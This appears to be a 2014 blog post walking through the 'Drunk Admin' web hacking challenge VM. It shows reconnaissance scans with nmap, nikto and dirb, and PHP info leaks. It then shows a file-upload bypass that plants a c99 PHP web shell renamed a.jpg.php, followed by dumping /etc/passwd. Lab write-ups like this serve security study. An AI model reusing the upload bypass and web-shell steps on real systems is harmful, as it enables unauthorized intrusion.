NetHack: Drunk Admin Web Hacking Challenge - information gathering + install a backdoor shell

netdiscover

Currently scanning: 192.168.62.0/16   |   Screen View: Unique Hosts

3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180

   IP            At MAC Address      Count Len   MAC Vendor
-----------------------------------------------------------------------------
192.168.56.1    08:00:27:00:e0:df    01    060   CADMUS COMPUTER SYSTEMS

192.168.56.100 08:00:27:3c:21:4a    01    060   CADMUS COMPUTER SYSTEMS

192.168.56.104 08:00:27:63:94:10    01    060   CADMUS COMPUTER SYSTEMS

root@kali:~# unicornscan -mT 192.168.56.104
TCP open                 ssh[   22]        from 192.168.56.104 ttl 64
Main [Error   chld.c:53] am i missing children?, oh well

root@kali:~# nmap 192.168.56.104 -pT0-65535

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:04 CET
Nmap scan report for 192.168.56.104
Host is up (0.00039s latency).
Not shown: 65534 filtered ports
PORT     STATE SERVICE
22/tcp   open ssh
8880/tcp open cddbp-alt
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)

root@kali:~# nmap -sS -sV -O 192.168.56.104 -pT22,8880

Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-08 17:10 CET
Nmap scan report for 192.168.56.104
Host is up (0.00037s latency).
PORT     STATE SERVICE VERSION
22/tcp   open ssh     OpenSSH 5.5p1 Debian 6+squeeze1 (protocol 2.0)
8880/tcp open http    Apache httpd 2.2.16 ((Debian))
MAC Address: 08:00:27:63:94:10 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.26 - 2.6.35, Linux 2.6.32
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

root@kali:~# nikto -host 192.168.56.104 -port 8880
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          192.168.56.104
+ Target Hostname:    192.168.56.104
+ Target Port:        8880
+ Start Time:         2014-01-08 17:13:50 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Retrieved x-powered-by header: PHP/5.3.3-7+squeeze8
+ The anti-clickjacking X-Frame-Options header is not present.
+ Cookie trypios created without the httponly flag
+ Server leaks inodes via ETags, header found with file /bBqXOGa0.eml, inode: 0x723b2, size: 0x33, mtime: 0x4ba515bf8ec40;4bcb127742900
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /info/: This might be interesting...
+ Uncommon header 'tcn' found, with contents: choice
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6544 items checked: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2014-01-08 17:14:02 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

root@kali:/usr/share/dirb# dirb http://192.168.56.104:8880/

-----------------
DIRB v2.21
By The Dark Raver
-----------------

START_TIME: Wed Jan 8 17:15:16 2014
URL_BASE: http://192.168.56.104:8880/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4592

---- Scanning URL: http://192.168.56.104:8880/ ----
+ http://192.168.56.104:8880/cgi-bin/ (CODE:403|SIZE:292)


+ http://192.168.56.104:8880/image (CODE:200|SIZE:1392)
...

+ http://192.168.56.104:8880/info (CODE:200|SIZE:1600)

...

+ http://192.168.56.104:8880/upload (CODE:200|SIZE:57)
...
-----------------
DOWNLOADED: 13776 - FOUND: 23

http://192.168.56.104:8880/

View source:

<a href="myphp.php?id=102">PHP</a>

http://192.168.56.104:8880/myphp.php?id=102

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000

...

http://192.168.56.104:8880/myphp.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C1000

Try harder, you might find something here. Or not? Who knows.

http://192.168.56.104:8880/myphp.php?id=101

Linux drunkadm 2.6.32-5-686

This program makes use of the Zend Scripting Language Engine:
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
    with Suhosin v0.9.32.1,
This server is protected with the Suhosin Patch 0.9.9.1

http://192.168.56.104:8880/myphp.php?id=108
Server Root     /etc/apache2

DOCUMENT_ROOT     /var/www
X-Powered-By     PHP/5.3.3-7+squeeze8
Set-Cookie     trypios=nop; expires=Wed, 08-Jan-2014 17:28:43 GMT

http://192.168.56.104:8880/myphp.php?id=116

APACHE_RUN_USER     www-data
APACHE_LOG_DIR     /var/log/apache2

http://192.168.56.104:8880/myphp.php?id=132

PHP Variables

http://192.168.56.104:8880/upload

upload a jpg

HTTP Live Header:

Set-Cookie: trypios=394659692a460258b45a99f1424ea357; expires=Wed, 08-Jan-2014 18:42:49 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=394659692a460258b45a99f1424ea357

source:

<img src="images/394659692a460258b45a99f1424ea357.jpg" >

http://192.168.56.104:8880/images/394659692a460258b45a99f1424ea357.jpg

Cookie: trypios=uploader

--
php encoder here:
http://xploitaday.komodin.org/tools/php-encoder/

download c99_preg_entropy.php

cp c99_preg_entropy.php a.jpg.php

http://192.168.56.104:8880/upload

a.jpg.php

Set-Cookie: trypios=922def33ac603be53b99c558f73c4db7; expires=Wed, 08-Jan-2014 18:58:28 GMT

http://192.168.56.104:8880/image.php

Cookie: trypios=922def33ac603be53b99c558f73c4db7

http://192.168.56.104:8880/images/922def33ac603be53b99c558f73c4db7.php

I got a C99 php shell on the system.

get /etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/false
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/false
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
mysql:x:104:107:MySQL Server,,,:/var/lib/mysql:/bin/false

ls -al /home/bob

total 28
drwxr-xr-x 4 bob bob 4096 Mar 6 2012 .
drwxr-xr-x 3 root root 4096 Mar 3 2012 ..
-rw-r--r-- 1 bob bob   220 Mar 3 2012 .bash_logout
-rw-r--r-- 1 bob bob 3184 Mar 3 2012 .bashrc
-rw-r--r-- 1 bob bob   675 Mar 3 2012 .profile
drwxr-xr-x 2 root root 4096 Mar 6 2012 Documents
drwxr-xr-x 3 bob bob 4096 Mar 6 2012 public_html

http://192.168.56.104:8880/~bob/

http://192.168.56.104:8880/~bob/encrypt.php

I didn't find any bug for privilege escalation in this system...

Hints from here: http://www.sec-track.com/solucionario-del-reto-security-challenge-ctf-web-por-nonroot-ganador-del-reto

NetHack

2014. január 9., csütörtök

Drunk Admin Web Hacking Challenge - information gathering + install a backdoor shell

Nincsenek megjegyzések:

Megjegyzés küldése